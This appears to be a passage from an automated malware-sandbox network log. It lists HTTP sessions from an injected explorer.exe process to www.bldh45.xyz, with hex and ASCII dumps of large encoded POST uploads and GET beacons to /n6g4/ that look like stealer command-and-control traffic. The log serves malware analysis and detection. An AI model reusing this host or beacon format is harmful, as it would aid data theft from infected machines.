May 14, 2022 15:30:28.782715082 CEST	9273	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sat, 14 May 2022 13:30:28 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49782	35.241.47.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:28.506386995 CEST	9248	OUT	POST /n6g4/ HTTP/1.1 Host: www.bldh45.xyz Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.bldh45.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bldh45.xyz/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 52 70 4c 67 49 61 4a 51 74 76 4b 72 32 33 47 59 6a 6e 66 6a 7a 39 79 64 75 37 4c 50 6f 59 6b 78 4f 74 28 37 39 6e 4b 76 50 67 49 47 4c 34 67 70 58 66 71 6f 4e 68 44 6e 68 70 44 66 37 63 42 78 30 31 5a 37 65 31 4a 63 43 36 50 41 73 64 44 78 6d 7a 34 6d 72 7a 5a 54 5a 55 46 4c 75 51 33 30 38 42 41 69 57 47 42 6f 64 68 38 49 73 4e 68 58 38 59 6a 4a 39 48 71 71 7e 4b 33 72 42 45 44 6a 6a 5a 6e 74 43 69 39 5a 43 6a 37 46 59 67 4c 6d 67 6b 54 74 7a 42 38 57 70 6f 71 79 7e 59 34 6b 59 54 61 49 68 61 43 4a 75 58 34 49 44 39 68 4a 4a 33 75 64 7e 32 65 4f 67 38 62 59 4e 69 6e 55 7a 6b 39 7a 74 62 62 31 4d 33 6a 6f 77 68 77 64 50 58 6c 38 30 41 31 69 48 41 6e 30 4e 4a 73 78 77 58 54 73 4d 4c 76 4a 39 79 4e 37 36 55 47 56 6f 78 7a 65 68 78 42 32 38 6f 77 30 6b 32 75 46 30 31 37 36 6d 70 67 73 5a 70 4c 51 43 77 78 4f 79 70 42 49 7e 6f 6b 55 4d 4e 77 45 28 66 55 48 57 63 63 49 65 57 4e 2d 7e 38 75 4a 69 4a 59 41 48 78 70 4f 35 4e 62 43 47 32 57 52 31 67 66 72 49 59 7a 5a 33 48 32 71 6c 51 30 46 77 65 36 39 75 7a 31 41 76 73 71 6b 32 31 59 37 64 55 4c 4a 4d 78 44 37 39 78 7e 62 36 62 72 64 59 45 57 6d 71 62 54 68 69 48 49 6b 79 6e 28 59 30 64 71 72 28 78 68 64 7a 49 33 5f 4a 51 39 59 35 37 32 30 67 54 4f 72 34 64 44 48 6e 69 53 73 75 44 55 73 49 37 43 50 35 52 46 67 62 68 4f 31 67 70 66 77 71 63 78 65 4b 52 4b 33 38 79 63 38 64 51 59 45 63 76 6f 48 6a 4f 63 52 59 30 35 44 33 4c 4d 37 38 32 4e 6e 66 6a 4a 39 28 4c 35 33 7a 6e 6f 78 78 4b 55 4a 4c 42 28 74 61 65 36 69 4a 41 61 76 65 57 6c 74 58 56 4c 78 63 49 51 46 39 34 38 74 7a 44 6a 44 71 64 63 5a 56 48 4d 44 68 45 6e 36 71 4e 7e 63 67 42 69 71 59 58 45 57 4b 48 74 55 7a 39 32 52 62 52 33 7a 37 6d 50 38 61 67 58 48 57 55 32 33 37 6e 63 6c 51 32 74 36 48 31 48 78 69 4a 48 2d 62 70 4e 70 4d 30 5a 41 36 6c 32 4a 68 55 63 4d 28 68 41 53 4c 31 6f 78 39 63 53 2d 68 61 79 43 57 43 64 64 38 5f 68 39 76 72 45 4d 38 34 68 41 28 50 43 34 50 54 6c 57 4a 32 4c 51 71 6d 6a 6e 58 42 28 47 56 47 34 4e 6f 64 72 68 75 70 34 49 7a 33 50 55 61 58 7e 57 48 59 4e 2d 76 4f 57 4d 47 56 72 6b 79 6c 61 65 77 74 4c 44 66 68 4b 69 65 4a 78 37 78 76 77 73 31 6f 46 31 6f 75 41 49 41 66 28 30 68 59 49 54 7e 68 47 76 6c 34 70 36 4c 43 63 73 55 78 5a 43 53 65 43 53 75 59 69 4a 62 5f 61 45 4c 46 61 72 6c 74 50 44 6a 58 6b 33 4d 64 71 4c 72 30 38 70 32 75 33 59 35 4b 39 37 41 48 57 6a 57 35 36 6a 66 53 6c 30 68 32 34 35 49 4c 47 5a 37 33 53 53 78 4f 65 6a 35 67 45 38 75 59 28 76 41 7a 77 77 28 62 6a 32 53 2d 34 51 76 66 58 44 76 54 28 59 64 69 47 4c 56 72 69 47 6e 39 4e 54 41 77 32 30 30 71 62 41 47 30 49 6e 7a 78 38 38 68 53 67 30 6f 71 32 4b 42 31 63 4b 6b 6d 59 56 58 34 65 73 6c 41 57 48 68 4a 38 6e 77 30 36 30 5a 53 4a 43 55 34 45 56 74 57 69 30 76 55 78 56 61 59 51 6c 74 56 33 4e 35 74 52 6a 4c 58 75 6f 62 63 54 62 78 64 4f 6b 56 69 58 51 6e 44 57 31 57 55 75 4b 62 31 54 79 45 6a 6f 48 4d 51 35 53 6f 7a 4a 62 35 30 48 63 51 44 71 69 5a 6b 36 57 31 52 77 58 6b 31 4a 44 77 6a 76 59 64 77 61 46 4e 49 48 75 63 6f 38 55 68 65 45 38 77 36 70 4d 46 53 30 74 43 6f 37 51 36 51 56 63 7a 43 34 47 65 49 56 7a 39 5a 41 7a 55 39 4d 4c 7a 7a 72 53 31 31 77 59 53 38 56 52 52 6d 6c 4c 78 7a 6e 7a 50 6d 62 33 72 37 5a 6c 4c 49 71 7a 56 31 46 61 28 62 45 44 6b 4a 4f 43 59 68 72 76 62 47 42 4d 50 53 4f 55 44 4f 56 62 62 2d 51 63 63 49 33 46 33 41 77 55 4f 42 72 31 52 2d 30 47 5a 52 64 49 4b 53 67 33 4a 67 65 79 28 34 7e 66 66 6a 45 34 44 30 71 43 68 78 43 79 28 44 76 31 6d 37 65 57 58 59 75 63 59 6a 50 77 74 54 43 33 42 69 62 4c 5a 35 43 42 31 48 39 48 52 61 65 77 43 63 72 77 35 59 35 6c 45 47 6b 76 6d 69 64 6c 4b 53 52 37 28 75 38 6d 37 49 46 57 4d 73 6e 67 55 5a 72 50 6c 66 77 50 50 79 67 33 6a 6a 56 46 68 45 6b 46 51 7a 4b 61 55 36 65 53 61 66 58 51 6b 69 67 41 6f 42 37 65 33 6e 52 78 54 32 76 78 68 4a 57 6f 59 63 71 4a 64 53 59 59 65 64 65 5a 68 41 69 54 35 73 63 66 78 62 61 78 4c 35 63 4e 5a 77 35 2d 50 70 4f 46 41 6b 63 36 36 73 28 42 57 4f 65 56 52 41 78 63 79 64 45 52 39 43 56 32 69 6a 77 6e 68 65 76 54 65 54 32 30 77 4a 48 75 41 5f 6a 63 46 51 39 48 77 47 46 55 30 58 35 4a 6a 57 47 34 4a 6f 71 64 62 44 6e Data Ascii: 3fe=RpLgIaJQtvKr23GYjnfjz9ydu7LPoYkxOt(79nKvPgIGL4gpXfqoNhDnhpDf7cBx01Z7e1JcC6PAsdDxmz4mrzZTZUFLuQ308BAiWGBodh8IsNhX8YjJ9Hqq~K3rBEDjjZntCi9ZCj7FYgLmgkTtzB8Wpoqy~Y4kYTaIhaCJuX4ID9hJJ3ud~2eOg8bYNinUzk9ztbb1M3jowhwdPXl80A1iHAn0NJsxwXTsMLvJ9yN76UGVoxzehxB28ow0k2uF0176mpgsZpLQCwxOypBI~okUMNwE(fUHWccIeWN-~8uJiJYAHxpO5NbCG2WR1gfrIYzZ3H2qlQ0Fwe69uz1Avsqk21Y7dULJMxD79x~b6brdYEWmqbThiHIkyn(Y0dqr(xhdzI3_JQ9Y5720gTOr4dDHniSsuDUsI7CP5RFgbhO1gpfwqcxeKRK38yc8dQYEcvoHjOcRY05D3LM782NnfjJ9(L53znoxxKUJLB(tae6iJAaveWltXVLxcIQF948tzDjDqdcZVHMDhEn6qN~cgBiqYXEWKHtUz92RbR3z7mP8agXHWU237nclQ2t6H1HxiJH-bpNpM0ZA6l2JhUcM(hASL1ox9cS-hayCWCdd8_h9vrEM84hA(PC4PTlWJ2LQqmjnXB(GVG4Nodrhup4Iz3PUaX~WHYN-vOWMGVrkylaewtLDfhKieJx7xvws1oF1ouAIAf(0hYIT~hGvl4p6LCcsUxZCSeCSuYiJb_aELFarltPDjXk3MdqLr08p2u3Y5K97AHWjW56jfSl0h245ILGZ73SSxOej5gE8uY(vAzww(bj2S-4QvfXDvT(YdiGLVriGn9NTAw200qbAG0Inzx88hSg0oq2KB1cKkmYVX4eslAWHhJ8nw060ZSJCU4EVtWi0vUxVaYQltV3N5tRjLXuobcTbxdOkViXQnDW1WUuKb1TyEjoHMQ5SozJb50HcQDqiZk6W1RwXk1JDwjvYdwaFNIHuco8UheE8w6pMFS0tCo7Q6QVczC4GeIVz9ZAzU9MLzzrS11wYS8VRRmlLxznzPmb3r7ZlLIqzV1Fa(bEDkJOCYhrvbGBMPSOUDOVbb-QccI3F3AwUOBr1R-0GZRdIKSg3Jgey(4~ffjE4D0qChxCy(Dv1m7eWXYucYjPwtTC3BibLZ5CB1H9HRaewCcrw5Y5lEGkvmidlKSR7(u8m7IFWMsngUZrPlfwPPyg3jjVFhEkFQzKaU6eSafXQkigAoB7e3nRxT2vxhJWoYcqJdSYYedeZhAiT5scfxbaxL5cNZw5-PpOFAkc66s(BWOeVRAxcydER9CV2ijwnhevTeT20wJHuA_jcFQ9HwGFU0X5JjWG4JoqdbDnujO01H62Ac6nijl0pPl8v~QJI5ZBGbi7LqUgR5YMvLYkyLcjVbfX7TtySKl4o6flRzJJIrMeLfRXUlO00wzp_JB6tbHsMEvL8AxeRjq21qLjxw0r9r9HoQ48_9egrockAaAq6(WMUgzORoM8Kzp7o9N6PHrR_bSjvKDADFzSFMh9gLvQS1teO3VAIufc6X7F1tGbzzyWpKFmLcZuHAvRfThps05m2ymKfxwdIhVt7E_3IcE6wtgLo39WmkBgTNIDVNs2bQ_01JHN8qwkz~epqV5VvwANxJhpH4evHUKjgvevra3saERuzHQ6_vf3M6zYUO2(rZsmRyPT2fb4QDmG7nuI5d6e0UzhlVmNNu9HMlIdbSUEWkXEmxD1RFmCJHW3DTI42AoKpg74VBs8NvqhKtHwWcQ9oP5Yus7MjPIZlcV9Pzuqo93~mx3DlxkDxniZonNpPdmD5XdTaKzk5FajK2ET8tYUr0PTHWtclGn~07Zvg~ykEj1T5SCLfcf914nYasOaFz6hrWZnEG7B561LucTdXPi7AALa8PElTixYB9qHGY41CpoVaFKDPurViNAiugGB1pSTj5zwgYBVAhn6PMfUfNb~Wf8Ty(-rmfVAoLi5IN6NKxoi5q5ONKjrPZf9OjQvA3cp-TrLDyPCGP6L56suwziLiR2i916oiY03ispI9OOUwi1hNVlfKMldn7WXoHsWdNRdZB4vToVDSfzTeYTVghAEO(UFhoq331xdXPO23UHr4B-htFMWWrjvvOgowCFjxfquGYfJUn8KqnyMRKrJqlU4ITOeiK39IK3XhcURmokZ3e6MwjyJQ7CXIZamgsX7BKF11579-mPdXN4KFxFNEOFbecY0XINUPBOnVKoQ9qUXld2tXTBx0cD1qprzJPOWfbTuLCVJVNAx780u2~AzuqHGXsfoB6pAgU8qgNrr2czoXRB27ccSRsZ41mOvViSqIYeGwh8othwu0ElIrKkDdgN5yXJXOIbxTM2vLs38Ka-OE~edWfVb1VHLYBsOeJIGM0GNmXMtL4YP2~f3GiwAaufOkO_AtRjps18YVTOAIIr5Z(rpfD71AfjR9K6NPhM4pOd5y(PotqjFWuCnyduEh4rYOlTYv8qTkI9aGTR5bx5rU4IVE6PGYsd8BWpZPYZyS2KTsKYmt7LVTvpMX6MmZ6Y8l~E1I7sKqCFd8C4np7dOUAi(2vXkZnibbmZpzNQHTCrZtUxblounfXSiO31OKDRwlMpxELpdWIFaUMk8KRA~MZROte10DF00lsVrmurmC113YAiiHjTgdWb3MAAyYaBJqLRKplpiOufAbspHmQGCMdM36mmW3oKRTlbbudco0NuRdO_re5x0MFAREaer0iseq82q3xgwe6f8S76QjAYnPf3vuo2wEMZ8H1CwkrLN8muvH8S1BLuEeQRNiHgNcmE0KzRTXI8Inrc23dMHnN_TZeKQ4Byftck3Nq-u_FkzBNVNBvfLwg-uA(3geIVKH9Q7Zy5MMgGqrRXrYDxbFMIV0rQm9fYj8Oqr8cFQKG9NCmZTp(xSGfz9gTgkZrHjEmt3Qs8YMqsTtvKDo7aspFSPpDC5M4W7xmCXZ68ZN9WYmqF(M62Luk5Dl93DMEpnEzoWv3B2OHD9p5_KmirZtlSTHikjQIBrFpeDLlukcMlASky2o0Wan0qKfRjzGXxkfi_JUpmmUDvXXqKxjnM~YYTRcLR~QBI(FhXPW7Kq1ka3ICjGGcPrXZ6cNfwhsT99e1Nq5dDO5x7dtoE96jc~l1_SBrBNiWyKWtBy43V~ZYrVtF8cEkI(vHvufr_JOUqTH2Rocitw6gPhgjhjaG8Iqq1paZ-5zror4vaL8T2qseXcR(18T9m7XQU3XO7QRTMcuxrofliyyyhHfqIpPFdHMlxTm2gzxJ8bjkdGeC-Bm0hY3UMGIh0O_l6Py1PCJvIXGzIwCceTPzKix2ledOs9W8WsHoCC_zduYXSPE2YAsoWZqlcwrkBzh67dbPIbt9OtHFpeKycSb515LiBZe5Ag7aOnySNE0eB5pcb3PMxR1B5W1UvKLgDJo0PWc9r1Z4Yw4YOqqejrXJrPhsRSLUuE59sSO~lfaMFRxIYd6VswpoqitqU79idduerjZOJbojpxO2my1RTfDBSOICQSz1nZNXHILF5LS1AW2C3tjzRF3g6Z_Tjfq~wA4sen0vQ~TL91M21CVxdozihhhstpOijSK0letez(DJPmQc8rH11vY43Leyvyui8U6kn4TiI(aBN49lZ(bbIRY65akswsKV13L3SaybyuUCYRHv9DvRBaVgd1pTKK6gojQRxvv2Ew8M4o7dxOXsFJL(ZOKQkNvexPICCxWhsZV7R~0~BcKH4M6DybxyL6ZHP5clkILXL6cnon5cY3RUSbcwblaAEucmNb-GXqWyo4lXRId4HvMripqXh8e5s1DHAzl6kIsiN(RmPi2zdF_LnjcO2LsnVTmRn1uUqEWX9JfmyNscu6-F7hBoxxc7OEtxSNwGzUz81vIXbIxkWI9UaT6ODQfRFfuDhbDBrwfUyqXWAdN9-UK1vYpWclL6D8MHgk15Wq2A5rgMK1Q~xF9cGTrhtR4UPIC5lbuwmlCuArXNueVb8h9rHMXnqfV(5cZwrJIW7L5jOgQedFmJ8Bi0XI9FjRX2QKk40kfKcWolptq8h5lNpBACJksOCeFTcXkOfhvQbhnk4AeXRGePUibN1Fe58
May 14, 2022 15:30:28.522442102 CEST	9251	OUT	Data Raw: 69 30 68 73 41 70 74 45 6a 4c 7a 36 73 52 58 44 73 64 55 4a 62 76 48 32 62 68 6c 54 74 44 31 72 6e 46 64 6a 56 58 56 43 4c 64 52 37 35 6a 67 2d 4e 36 28 62 64 4d 57 43 52 73 4b 49 6f 64 66 73 67 7a 36 4f 46 30 56 5f 6d 38 65 48 6d 78 4b 31 54 35 Data Ascii: i0hsAptEjLz6sRXDsdUJbvH2bhlTtD1rnFdjVXVCLdR75jg-N6(bdMWCRsKIodfsgz6OF0V_m8eHmxK1T5PNBtqaek0DYE(3uZBKtfzWUdFSGeCnrd~roC8iaVxjmip9asVr1kFF8Br11OT1P8P_kVSJArPMUgBkTW~hOhBfh9Z-78J1WnP4sABvXnrkxjcdq0MtoZWPkpX5dPQaxV7SgNa4~SbWV77NvG0jyq(93t9KJ1jLzI2
May 14, 2022 15:30:28.522483110 CEST	9253	OUT	Data Raw: 36 42 4b 71 35 36 43 47 44 52 5a 50 38 77 51 72 4a 34 6d 47 76 6e 53 31 61 62 59 56 75 5a 4e 47 71 76 57 68 6f 30 5a 61 46 52 69 47 58 4e 36 65 6c 55 67 5f 46 51 72 71 37 6e 37 67 43 32 39 6d 67 6f 69 64 52 51 52 61 6b 45 43 6f 67 58 54 55 79 70 Data Ascii: 6BKq56CGDRZP8wQrJ4mGvnS1abYVuZNGqvWho0ZaFRiGXN6elUg_FQrq7n7gC29mgoidRQRakECogXTUypDbG4WABVpaRPfKVB7MZiV-~j4FZdKqCe3n1C2ds7l6PU3UazQMT2djuoPBFMi6WFq5UzbaN1pMS5(v2lyx9ztCglWttR2_eZ(2KV8ZAYQbG7uZbLrfXZfMfJBDDM8cuQ9GVdZxusjkx7fSG8l3qych1y1bxXITqgd
May 14, 2022 15:30:28.522496939 CEST	9256	OUT	Data Raw: 44 66 34 76 6c 44 6d 51 69 62 4e 73 33 62 73 61 34 4b 6c 36 4d 42 33 42 74 30 36 39 65 31 7e 47 57 6d 4f 46 6f 47 34 37 67 37 46 6c 4b 6f 42 73 6a 4d 53 33 77 55 4b 4e 44 4a 7a 41 7a 4f 5a 53 61 79 65 4a 6d 49 33 56 32 44 64 54 6b 76 5a 34 53 4c Data Ascii: Df4vlDmQibNs3bsa4Kl6MB3Bt069e1~GWmOFoG47g7FlKoBsjMS3wUKNDJzAzOZSayeJmI3V2DdTkvZ4SLp8QcvxIIEGqoM23BlOJYYYKh26RJxCZro2XcwAxZphlYlT~m7wnCP3SmkZjaJKpSKfViQTLis3eDx8vGsKuPqoNwrtHM0cHUhAsoDXw43532S9pLCCacKNqPPeH6gW2MWmUAkNF87NtbL9zrvr~jGLcf1T6EDIGB1
May 14, 2022 15:30:28.522509098 CEST	9259	OUT	Data Raw: 33 79 31 2d 43 4b 4d 58 67 49 7e 36 77 7a 65 73 43 6f 4f 55 36 36 72 5a 75 4e 51 32 45 45 6a 58 7e 4b 49 77 56 6f 75 6c 68 53 49 63 59 36 30 71 70 5f 34 58 45 47 6a 4a 4f 52 4e 73 45 75 4c 78 42 46 61 78 53 61 33 48 6a 77 38 58 47 6a 41 71 42 41 Data Ascii: 3y1-CKMXgI~6wzesCoOU66rZuNQ2EEjX~KIwVoulhSIcY60qp_4XEGjJORNsEuLxBFaxSa3Hjw8XGjAqBAwLgV4b7K1uIkokuLbWm_Ek4ndRADouSfG40FTjeXmAn5d0QuLX1wVZyAk4AIQfAQkAG4k9o43SvKqUCQzAzupPSbGp0ixZ2nbsiodOwddeBKDvk5tds5pJDv(1czj8huSux_FGSTw2ZniFv3TrnnkOhN2COeimL83
May 14, 2022 15:30:28.522521019 CEST	9261	OUT	Data Raw: 28 74 75 49 62 45 35 66 50 4e 65 48 53 5f 32 4e 28 44 46 44 7e 4f 37 51 49 55 39 4c 42 56 62 6e 36 65 72 67 70 44 75 51 79 75 68 33 56 69 54 46 49 34 4e 38 77 4f 5a 38 63 73 70 65 36 66 51 4b 57 5f 49 52 74 45 66 53 4f 79 57 6b 6e 31 50 53 4f 34 Data Ascii: (tuIbE5fPNeHS_2N(DFD~O7QIU9LBVbn6ergpDuQyuh3ViTFI4N8wOZ8cspe6fQKW_IRtEfSOyWkn1PSO4Nu(wzRI46rsDYnmSifh1pxUvzZHLYP1OaC7qQR9sEzG0jR608IJiMihWlArxMrZqXgkaWanP7ePkcYnIQfZ6GZF47t1ykh0xD4elCq5TQ_PkXHpPhexaROxq(3SKJjzMEzTJ5UOc61IdwoZ0US(vf4L23wURttxPy
May 14, 2022 15:30:28.522550106 CEST	9264	OUT	Data Raw: 43 66 30 51 32 6e 64 30 52 69 37 53 32 77 54 52 65 6c 6a 33 7a 4f 35 4c 47 43 33 63 34 2d 61 43 46 44 53 64 51 4d 7e 69 5a 46 49 45 33 6d 61 6b 51 52 77 6a 37 77 6f 38 68 4d 74 6c 4f 72 51 31 31 44 63 73 65 7a 79 32 47 5f 72 6e 6e 4d 7a 51 45 6d Data Ascii: Cf0Q2nd0Ri7S2wTRelj3zO5LGC3c4-aCFDSdQM~iZFIE3makQRwj7wo8hMtlOrQ11Dcsezy2G_rnnMzQEmPmAGlFpMFrPT(lTagH7xphhg4IWJKLWFnjSqiUHpj0SveJCv6m7jR-WQymULRJ8hUwbK1W~X5_(d2V98YrO1ELH30jESaBSjCTbTfpl_JH4Zhhoks-S7CTzWQiPJapMdWtN46qPjkQmLeRTqj1kdNo7ug_kV4pSP6
May 14, 2022 15:30:28.522566080 CEST	9267	OUT	Data Raw: 4f 78 7e 50 51 4d 68 36 47 69 4c 66 56 4a 72 62 53 76 43 49 48 61 47 47 62 43 57 41 7a 38 7e 50 4e 56 67 34 32 65 47 45 49 64 4b 4e 52 74 48 73 53 73 4a 6a 30 78 73 6d 6f 75 4a 74 30 5f 69 74 69 5f 66 35 74 55 51 74 34 64 30 46 4f 4f 7e 4e 5a 32 Data Ascii: Ox~PQMh6GiLfVJrbSvCIHaGGbCWAz8~PNVg42eGEIdKNRtHsSsJj0xsmouJt0_iti_f5tUQt4d0FOO~NZ2VrSMhHZiCEld5k3pmZaF5LlFQ05xmH~kqAwxPRTN3w00GZUgNHosKMP-l0W962aDz580b2v9Tttb3K9H71dA2mDOqjGw2B(sP_zZgpA0KnIWUoiQGsSL(0~e4jeF~TnEGgmo2gpSh_HB2iKHWr10IQrZzFVY9xgdX
May 14, 2022 15:30:28.522577047 CEST	9270	OUT	Data Raw: 38 43 4a 51 37 63 4b 79 63 44 79 70 73 34 56 53 36 37 6c 68 74 5a 50 6a 74 54 6b 67 43 56 58 31 72 33 74 53 54 6b 31 6b 4b 6f 67 79 48 61 39 44 45 66 78 35 38 32 47 71 28 76 34 63 53 6c 68 4e 50 35 4c 30 51 57 73 48 64 34 62 51 75 30 71 35 68 31 Data Ascii: 8CJQ7cKycDyps4VS67lhtZPjtTkgCVX1r3tSTk1kKogyHa9DEfx582Gq(v4cSlhNP5L0QWsHd4bQu0q5h1hVQlGM688uKlNbBU9owAxlolo32Jl-AglplaT8N3Pv2MQQ6Iuv2OfxK5HReI9TmSYcD0rGSuBrTu85sFrYlUVdY7A96LutDULrZN9YnZq7rznnDlMSYeq6PlzK~SEUsaJ6dpZMDL(tqp5EfY0UCk~6ymqWHsVXEOy
May 14, 2022 15:30:28.522608995 CEST	9272	OUT	Data Raw: 43 74 46 51 7e 58 44 4f 47 76 62 74 53 30 42 43 49 53 4e 6a 78 57 73 4c 58 5a 46 36 36 6e 5a 47 72 5a 4a 36 31 50 64 67 42 54 34 77 4b 38 38 58 34 31 65 75 48 37 42 73 56 68 48 6f 48 77 37 45 64 47 32 6a 6d 30 44 52 78 44 39 56 4e 4f 64 44 4a 4e Data Ascii: CtFQ~XDOGvbtS0BCISNjxWsLXZF66nZGrZJ61PdgBT4wK88X41euH7BsVhHoHw7EdG2jm0DRxD9VNOdDJNWf2diC0SZJc_9ayObQ7NXy9jaHA2Y8uSmkpxKACWzD0-86Pb15RmLPvsEJAELxieZaUPA0uP1a9Qs-6gBe(VxYUfPXJZ2Y5p15vyxz1L30DxeQ0VDdR9tid-J-8Ejt~_wauNNa1F62qMsSVA4cpXXyZy00ek1lRAg
May 14, 2022 15:30:28.803536892 CEST	9274	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sat, 14 May 2022 13:30:28 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49783	35.241.47.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:28.532234907 CEST	9272	OUT	GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1 Host: www.bldh45.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:30:28.838778973 CEST	9276	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 14 May 2022 13:30:28 GMT Content-Type: text/html Content-Length: 5248 Last-Modified: Fri, 11 Mar 2022 02:41:55 GMT Vary: Accept-Encoding ETag: "622ab6f3-1480" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 38 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 